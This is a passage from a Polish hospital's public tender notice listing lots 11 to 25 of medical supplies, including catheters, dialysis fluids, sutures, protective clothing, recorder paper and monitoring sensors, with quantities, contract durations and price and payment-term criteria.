<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cewniki sterylne do odsysania górnych dróg oddechowych  z otworem centralnym i dwoma otworami (bocznymi) naprzeciwległymi, zmatowiona powierzchnia , pakowany pojedynczo w opakowanie folia /papier typu blister pack CH 8,10,14,16,18,20,22. Rozmiar do wyboru zamawiającego.	sztuka	4500
2	Cewnik do odsysania w systemie zamkniętym na 72 godziny do rurek intubacyjnych o długości 54 cm,
do rurek tracheotomijnych o długości 34 cm, skalowany co 1 cm, rozmiar kodowany kolorystycznie
oraz numerycznie na cewniku, z jednym otworem centralnym i 2 bocznymi ułożonymi naprzemiennie, z blokadą próżni wyposażoną w zatyczkę na uwięzi, pozbawiony DEHP kompatybilny z adapterem do dróg oddechowych z poz. 3.  Rozmiar 14F i 16 F do wyboru zamawiającego	sztuka	50
3	Uniwersalny adapter  do połączenia obwodu oddechowego z rurką intubacyjną  lub tracheotomijną, z możliwością  stosowania przez 7 dni, pozwalający bez rozłączania  obwodu oddechowego na odsysanie w systemie zamkniętym, otwartym, wykonanie procedury bronchoskopii, mini-Bal, podanie leku, rozgałęziony pod kątem  45 stopni, podwójnie obrotowy, z portem do przepłukiwania cewnika, z silikonową, bezobsługową,  samouszczelniającą się, dwudzielną zastawką.

sztuka	50
4	Zestaw do 24-godzinnej toalety jamy ustnej o składzie: 
2 osobne opakowania każde zawierające 1 szczoteczkę do zębów z odsysaniem z zastawką manualną do regulacji siły odsysania i gąbką na górnej powierzchni co umożliwia delikatne czyszczenie dziąseł, 1 opakowanie z bezalkoholowym, antyseptycznym płynem do płukania jamy ustnej z 0,12% roztworem chlorheksydyny, 1 gąbkę aplikator , 1 osobne opakowanie zawierające 1 gąbkę pokrytą dwuwęglanem sodu z odsysaniem z zastawką manualną do regulacji siły odsysania oraz z zagiętą końcówką, 1 jednorazową saszetkę bezalkoholowego, antyseptycznego płynu do płukania jamy ustnej z ok. 7 ml z 0,05% roztworu chlorku cetylopirydyny, 1 jednorazową ok. 2 g saszetkę preparatu nawilżającego do ust na bazie wodnej oraz 1 gąbkę aplikator.
Każde pojedyncze opakowanie zawarte w zestawie pełni jednocześnie funkcję pojemnika. Zestaw powinien posiadać możliwość powieszenia na plastikowej zawieszce oraz zawierać numerację sugerującą kolejność stosowania. 
zestaw	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do drenażu płynów gromadzacych się w jamie brzusznej.Skład :Worek 8L(+/- 0,5L) skalowany,wbudowana zastawka antyzwrotna, zawór spustowy,dreny łączące pomiedzy workiem a kranikiem trójdrożnym, kaniula 16G,strzykawka 60ml (+/-1ml),trójdrożny kranik .	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Nawilżacz do dozownika jednorazowy , zamknięty system do nawilżania mieszaniny oddechowej kompatybilny z dozownikiem rotametrycznym do punktu poboru tlenu AGA, zakres 0-171/min.Wyjście gwintu UNF9/16. Skład systemu: Sterylna woda apirogenna  do nawilżania tlenu w jednorazowym pojemniku poj. 500-650ml. ze sterylnie zapakowanym łącznikiem do dozownika tlenu.System mikrodyfuzorów na spodzie pojemnika w celu odpowiedniego nawilżeniu tlenu ,wraz z dozownikiem tlenu. 	sztuka	203
2	Filtr oddechowy ,sterylny,elektrostatyczny,przeciw bakteryjno-wirusowy, okrągły z końcówką do kapnografu z przestrzenią martwą ze skutecznością p/bakteryjna 99,9%.Objetość oddechowa 150-1200ml.Waga max 30g	sztuka	250
3	Filtr oddechowy ,przy oddechu własnym za pomocą rurki tracheostomijnej z możliwością podawania tlenu	sztuka	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Roztwór soli do dezynfekcji w myjni Cleantop WM-S Firmy Kaigen Co Ltd. saszetka	600
2 Filtr mechaniczny  do oczyszczania środka dezynfekcyjnego typu CMD - 800905D lub równoważny do używania w myjni Cleantop WM-S	sztuka	13
3 Filtr do oczyszczania powietrza ze związków lotnych chloru typu CMD 800455D lub równoważny do używania w myjni Cleantop WM-S	sztuka	25
4 Filtr mechaniczny, mikrobiologiczny dla cząstek poniżęj 0,2 typu CMD M lub równoważny do używania w myjni Cleantop WM-S	sztuka	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filtr  powietrzny typu Porex lub równoważny do inhalatora Medel Pro	sztuka	15
2	Filtr bakteriologiczny do autoklawu TAU CLAVE 3000	sztuka	3
3	Filtr bakteriologiczny do autoklawu  Steril Clave 18/24 VLS	sztuka 	3
4	Złoże do filtra wody typu DS. 200 firmy Getinge	sztuka 	4
5	Filtr do nebulizatora okrągły kompatybilny z typem Voage Secura	sztuka 	10
6	Filtr do materaca zmiennociśnieniowego typu 88 lux 	sztuka 	100
7	Filtr bakteriologiczny do autoklawu  EUROPA BXP	sztuka	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Siatka Rotha do usuwania polipów za pomocą sprzętu endoskopowego.	sztuka	3
2	Pułapka do usuwania polipów endoskopowo	sztuki	2
3	Ustnik jednorazowy do gastroskopu wykorzystywanego w  badaniu dorosłych 	sztuki	100
4	Ustnik w. użytku do gastroskopu wykorzystywanego w  badaniu dorosłych. Możliwość sterylizacji w autoklawie	sztuka	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Dializator wysokoprzepływowy -High flux, błona poliamidowa, pow.1,7m2, klirens mocznika 270	sztuka	25
2	Zestaw igieł dializacyjnych tętniczo-żylnych 	sztuka	25
3	Zestaw:Linia krwi tętniczo -żylna  komora odpowietrzająca, łącznik stabilizujący segment pompy krwi- kompatybilny z aparatem AK 200F GAMBRO	sztuka	75
4	Filtr węglowy do aparatu WRO 300H	sztuka	3
5	Wskaźniki paskowe do badania twardości wody 	sztuka	50
6	Zestaw do zabiegów ciągłych nerko zastępczych (hemofiltr z liniami - do aparatu typ Prismaflex ) o długości 1,5m	sztuka	40
7	Worek 5L na ultra filtrat kompatybilny z zestawem do zabiegów CRRT do aparatu Prismaflex	sztuka	50
8	Dren do podawania wapnia kompatybilny z zestawem do zabiegów CRRT z użyciem cytrynianów do aparatu Prismaflex	sztuka	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Koncentrat zasadowy suchy do dializ , waga 720g +chlorek sodu 1200 g	sztuka	20
2	Koncentrat kwaśny w opakowaniu 500ml rozcieńczenie 1:400,po rozcienczeniu 1 opk=200Lpłynu dializacyjnego	sztuka	30
3	Kwas cytrynowy suchy, w kolumnie ,waga 32g, zawartość wystarczająca do wykonania 1 dezynfekcji	sztuka	50
4	Weglan sodu ,suchy,w kolumnie,waga13g,zawartość wystarczająca do wykonania 1 dezynfekcji	sztuka	50
5	Płyn do czyszczenia aparatu Dialox	sztuka	2
6	Płyn substytucyjny stosowany w ostrej niewydolności nerek worek dwukomorowy 5L o zawartości K+2mmol i osmolarności 297mOsm/L.Opakowanie x 2 worki a 5L.Połączenie zestawu do zabiegów z workiem ma się odbywać przez port z dużą gumową membraną przekłuwaną plastikową igłą bez konieczności przełamywania zawleczki.	sztuka	100
7	Płyn substytucyjny stosowany w ostrej niewydolności nerek worek dwukomorowy 5L o zawartości K+4mmol i osmolarności 301mOsm/L.Opakowanie x 2 worki a 5L.Połączenie zestawu do zabiegów z workiem ma się odbywać przez port z dużą gumową membraną przekłuwaną plastikową igłą, bez konieczności przełamywania zawleczki. Skład: Sód 140mmol/l, Magnez 0,5mmol/l,Chlorki 113,5mmol/l.Mleczany 3mmol/l	sztuka	100
8	Płyn substytucyjny z zawartością cytrynianu ,kompatybilny z aparatem Prismaflex ,Worek 5L o zawartości cytrynianu 18mmol/l.Połączenie zestawu do zabiegów z workiem przez port z dużą gumową membraną przekłuwaną plastikową igłą, bez konieczności przełamywania zawleczki kompatybilny z zestawem CRRT do aparatu Prismaflex Skład Sód 140mmol/l,Chlorki 86mmol/l	sztuka	250
9	Płyn dializacyjny bezwapniowy kompatybilny z aparatem Prismaflex stosowany z płynem substytucyjnym z zawartością cytrynianów,Worek 5Ldwukomorowy .Połączenie zestawu do zabiegów z workiem przez port z dużą gumową membraną przekłuwaną plastikową igłą, bez konieczności przełamywania zawleczki kompatybilny z zestawem CRRT do aparatu Prismaflex.Skład wodorowęglan 22mmol/l,glukoza 6,1mmol/l,mleczany 2mmol/l,chlorki 120mmol/l,potas 4mmol/l	sztuka	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Półmaska ochronna dla personelu medycznego - respiratorowa spełniająca wymogi klasy FFP3 wg EN 149:2001 zarejestrowana jako środek ochrony osobistej, w kształcie stożka jednopanelowa, Warstwa zewnętrzna składa się z wodoodpornej włókniny polipropylenowej, warstwa filtrująca składa się z mikro włókna , a warstwa wewnętrzna składa się z fizjologicznie nieszkodliwej miękkiej włókniny, wszystko połączone w procesie ultradźwiękowym. Czas  ochronny stosowania maski min 8h. Opakowanie zbiorcze max 50 szt.	sztuka	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia  dł.igły 17 mm, 3/8 koła-okrągło tnąca; rozmiar 4/0;nitka bezbarwna długość szwu 75 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach	sztuka	60
2	Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia   dł.igły 26 mm, 1/2 koła-okrągła rozwarstwiająca; rozmiar 3/0; długość szwu 75 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach	sztuka	60
3	Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia    dł.igły 31 mm, 1/2 koła-ookrągła rozwarstwiająca; rozmiar 2/0; długość szwu 75 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach	sztuka	72
4	Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,;powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia   dł.igły 48 mm, 1/2 koła-okrągła wzmocniona; rozmiar 0;szew z pokryciem antybakteryjnym  długość szwu 90 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach	sztuka	180
5	Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia   dł.igły 48 mm, 1/2 koła-okrągła wzmocniona; rozmiar 1;Szew z pokryciem antybakteryjnym o długość 90 cm (tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach	sztuka	180
6	Nić/Szew powlekany, syntetyczny, plecony , wchłanialny, poliglaktyna 910,powlekany kopolimerem glikolidu i laktydu oraz stearynianem wapnia ; dł.igły 48 mm, 1/2 koła-okrągła wzmocniona; rozmiar 2Szew z pokryciem antybakteryjnym o długości 90cm(tolerancja dł. Igły +/- 5 %) czas wchłaniania 56-70 dni, czas podtrzymywania tkankowego 75% po 14 dniach	sztuka	90
7	Nić/Szew syntetyczny, niewchłanialny, monofilamentowy, poliamid 6 i 6,6;pakowany na mokro o zmniejszonej hydrofilności dł. igły 26 mm, 3/8 koła-odwrotnie tnąca; rozmiar 2/0; długość szwu 75 cm (tolerancja dł. igły i nitki +/- 5%)	sztuka	18
8	Nić/Szew syntetyczny, niewchłanialny, monofilamentowy, poliamid 6 i 6,6;;pakowany na mokro o zmniejszonej hydrofilności  dł. igły 26 mm, 3/8 koła-odwrotnie tnąca; rozmiar 3/0; długość szwu 75 cm (tolerancja dł. igły i nitki +/- 5%)	sztuka	36
9	Nić/Szew syntetyczny, niewchłanialny, monofilamentowy,poliamid 6 i 6,6;;pakowany na mokro o zmniejszonej hydrofilności dł. igły 19mm, 3/8 koła-odwrotnie tnąca; rozmiar 4/0; długość szwu 75 cm (tolerancja dł. Igły i nitki +/- 5 %)	sztuka	54
10	Nić/Szew syntetyczny, niewchłanialny, monofilamentowy,poliamid 6 i 6,6;pakowany na mokro o zmniejszonej hydrofilności ;dł. igły 40mm, 1/2 koła-odwrotnie tnąca; rozmiar 0; długość szwu 100 cm (tolerancja dł. Igły i nitki +/- 5 %)	sztuka	60
11	Nić/Szew syntetyczny, niewchłanialny, monofilamentowy,poliamid 6 i 6,6pakowany na mokro o zmniejszonej hydrofilności ;;dł. igły 48mm, 1/2 koła-odwrotnie tnąca; rozmiar 1; długość szwu 100 cm (tolerancja dł. Igły i nitki +/- 5 %)	sztuka	90
12	Szew niewchłanialny monofilamentowy,polpropylen syntetyczny ,igły o zwiększonej stabilności w imadle odporne na stepienie i odkształcenie podczas wkłucia (np. typ prolene lub równoważny) rozmiar 5,0	sztuka	18
13	Szew niewchłanialny monofilamentowy,polpropylen syntetyczny ,igły o zwiększonej stabilności w imadle odporne na stepienie i odkształcenie podczas wkłucia (np. typ prolene lub równoważny) rozmiar 4,0	sztuka	18
14	Szew niewchłanialny monofilamentowy,polpropylen syntetyczny ,igły o zwiększonej stabilności w imadle odporne na stepienie i odkształcenie podczas wkłucia (np. typ prolene lub równoważny) rozmiar 3,0	sztuka	18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czepki pielęgniarskie z przewiewnej włókniny, okrągły, wykończony delkiatną gumką opinająca głowę, niejałowy, 	sztuka	2000
2	Czepek pielęgniarski ze zwiększoną częścią tylną z elastycznym brzegiem i środkowym przeszyciem w formie gumki umożliwiającym dobre podtrzymanie włosów oraz dopasowanie do kształtu głowy. Odpowiedni dla dłuższych włosów. Wykonany w całości z perforowanej włókniny wiskozowej o gramaturze min 25g/m2 zapewniającej doskonałą oddychalność i komfort noszenia. Kolor zielony lub niebieski.W opakowanie w formie kartonika umożliwiajacego wyjmowanie pojedynczych sztuk 	sztuka	400
3	Czepek chirurgiczny z perforowane włókniny wiskozowej 25g/m2 w formie pirackiej bandany wiązany na karku. 	sztuka	500
4	Fartuch medyczny przeznaczony dla personelu medycznego niesterylny,przewiewny z włókniny SMS  lub z włókniny polipropylenowej o gramturze min. 30g/m2,max 40g/m2 rękawy długie ,zakończone mankietem, posiadający wizanie przy szyi i trok do zwiazania fartucha w pasie, rozmiar L, XL i XXL do wyboru Zamawiającego	sztuka	10000
5	Fartuch chirurgiczny jałowy ,pakowany indywidualnie typu folia-papier wykonany z włókniny typu SMS trójwarstwowej, min. 35g/m2,  rozmiar L-XXL do wyboru zamawiającego. Fartuch , zakrywający część szyi, klatkę piersiową, brzuch, kończyny dolne i górne. Rękawy zakończone elastycznym poliestrowym mankietem. Tylne części fartucha nachodzące na siebie ( sterylne plecy). System troków umożliwiających aseptyczne zakładanie fartucha. Na karku szyi zapięcie typu rzep. Szwy wykonane techniką ultradźwiękową. Fartuch zgodny z normą PN EN 13795.	sztuka	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Papier do zapisów wyników w defibrylatorze Lifepak 20 w kratkę, wymiary 50x 30 mm	sztuka	5
2	Papier termoczuły w kratkę milimetrową do aparatu Defimax,szerokość  55mm, średnica zew. rolki: 35-40mm, 	sztuka	40
3	Papier termoczuły w kratkę milimetrową do defibrylatora DMS 750, szerokość  50mm, średnica zew. rolki: 45-50mm	sztuka	20
4	Papier do USG o cechach nie gorszych niż typu, K -  61 B - CE  Mitschubischi  lub równoważny, do USG 	sztuka	75
5	Papier termoczuły w kratkę milimetrową do aparatu EKG Askard 33,szerokość 110mm, długość: min. 10 metrów bieżących 	sztuka	60
6	Papier w kratkę milimetrową do EKG do aparatu Ascard M-TRACE formatu A4 wymiar rolki 112x25mn	sztuka	225
7	Papier do defibrylatora termoczuły z nadrukiem szer 50mn, grubość rolki 40- 45mm	sztuka	25
8	Papier w rolce do drukarki Videoprinter SONY, używanej do wydruków z badań USG UPP-1105 długość: 20 metrów bieżących	sztuka	75
9	Papier do monitora Philips Goldway G30 w kratkę milimetrową o szerokości 50mm, średnica zew. 40mm	sztuka	25
10	Papier do aparatu Ascard MR Gold termoaktywny niewoskowany  w kratkę milimetrową  szer rolki 210mn +02mn śr zew. rolki 4,5cm	sztuka	100
11	Papier do EKG HP format A4 składanka w kratkę szer 210 x300x200mn	składanka	5
12	papier do sterylizatora COMINOX rolka termoczuła,  wymiary 57x20mm	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czujnik  saturacji wielorazowy dla dorosłych, jednoczęściowy do pulsoksymetru do aparatu typ Datex Ohmeda S/5, czujnik podłączany bezpośrednio do monitora	sztuka	3
2	Czujnik pomiaru  saturacji +SpCO, typu MASIMO set Rainbow DCI- lub równoważny	sztuka	2
3	Czujnik temperatury powierzchniowy dla dorosłych i dzieci jednorazowy kompatybilny z aparatem typu Datex Ohmeda S/5	sztuka	10
4	Dren do pomiaru spirometrii jednorazowy, długość 3m, kompatybilny z systemem monitorowania DATEX S/5 (opakowanie  5szt.)	sztuka	25
5	Kabel odprowadzający multilinkdo zapisu EKG do aparatu Datex Ohmeda S/5	sztuka	3
6	Mankiet wielorazowy do mierzenia ciśnienia do aparatu Datex Ohmeda S/5.Rozmiar 23-33(msub) lub rozmiar 25-35 cm	sztuka	5
7	Przewód do pomiaru ciśnienia do kardiomonitora Datex Ohmeda S/5(msub)	sztuka	3
8	Pułapka wodna typ Defend do modułu spirometrycznego systemu monitorowania  Datex Ohmeda S/5, jednorazowa	sztuka	65
9	czujnik temperatury centralny, pediatryczny, 9F, jednorazowy kompatybilny z aparatem typu Datex Ohmeda S/5	sztuka	5
10	Czujnik temperatury centralny, dla dorosłych 12F jednorazowy, kompatybilny z aparatem typu Datex Ohmeda S/5	sztuka	40
11	Kabel połączeniowy do czujników temperatury jednorazowych dł 2,5m, kompatybilny z aparatem typu Datex Ohmeda S/5	sztuka	2
12	Kabel połączeniowy do mankietów wielorazowych dla dorosłych i dzieci,dł 3,6m, kompatybilny z aparatem typu Datex Ohmeda S/5	sztuka	1
13	Mankiet do pomiaru RR dla osób otyłych.MankietNIBP na przedramię w kształcie stożka ,26-36cm lub 25-35cm lub 33-47 cm (dla otyłych), połączenia Mated Submin	sztuka	3
14	Mankiet NIBP,SOFT-CUF,jednopacjentowy,niemowlecy 8-13cm lub 8-15cm, 2-tubowy,połączenie Mated Submin	sztuka	3
15	Mankiet NIBP,SOFT-CUF,jednopacjentowy,niemowlecy 12-19cm lub 12,4-16,8cm, 2-tubowy,połączenie Mated Submin	sztuka	3
16	Mankiet NIBP,SOFT-CUF,jednopacjentowy,dla dorosłych,mały,17-25cm,2-tubowy,połączenie Mated Submin	sztuka	3
17	Czujnik do pomiaru spirometrii D-lite dla dorosłych, jednorazowy	sztuka	40
18	Czujnik do pomiaru spirometrii Pedi lite dla dzieci, jednorazowy	sztuka	5
19	Czujnik jednorazowy ,jednoczęściowy, do pomiaru SpO2+SpCo,w technologii Masimo, dla dzieci 3Kg-30kg	sztuka	5
20	Czujniki  Sp O2 Trusignal na ucho (min 4m),bezpośredni, kompatybilny z aparatem typu Datex Ohmeda S/5	sztuka	4
	ww. sprzęt  - Gwarancja 2 lata. Przeglądy konserwacyjno - kontrolne (czestotliwość wg zaleceń producenta),  przez okres gwarancji w cenie dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Termometr bezdotykowy- Zakres temperatur  użytkowania 10°C do 43°C. Moc DC3 V. Dokładność pomiaru +/- 0,1°C. Zasięg pomiaru dla ciało: 30- 50°C, dla powierzchni:  0-100°C.
Odległość dla pomiarów: min.15cm. Automatyczne włączanie po  max 6 sek. i automatyczne wyłączanie.  Sygnalizacja dźwiękowa podwyższonej temperatury. Pamięć min 30 ostatnich pomiarów. Podświetlany wyświetlacz LCD. Pomiar w stopniach Celsjusza. Możliwość sprawdzania za pomocą termometru, temperatury wody i temp. pokojowej. W komplecie z bateriami.                                                                               Gwarancja 2 lata. Przeglądy konserwacyjno - kontrolne (czestotliwość wg zaleceń producenta),  przez okres gwarancji w cenie dostawy.
	komplet	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ciśnieniomierz diagnostyczny, zegarowy, do pomiaru ciśnienia skurczowego i rozkurczowego, dwuprzewodowy: oddzielnie manometr (duża tarcza) z uchwytem umożliwiającym zamontowanie do mankietu i oddzielnie gruszka pompka z zaworem (typu TM-Z/S lub równoważne),  uchwyt mocujący manometr do mankietu wykonany ze stali, Skala znakowana od 0 do 300 mm Hg, z podziałką co 2 mm, maksymalny błąd pomiarowy + - 3 mm Hg, dostępny z mankietami różnych rozmiarów, w komplecie z 2 mankietami  dla dorosłych , wykonanymi z  tkaniny odpornej  na działanie  środków dezynfekcyjnych i częste pranie, w rozmiarach: 
1 sztuka standardowy (140x500mm) + - 10mm,
 1 sztuka duży  (170x590mm) + - 10mm,
Gwarancja 2 lata. Przeglądy konserwacyjno - kontrolne (czestotliwość wg zaleceń producenta),  przez okres gwarancji w cenie dostawy. sztuka	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
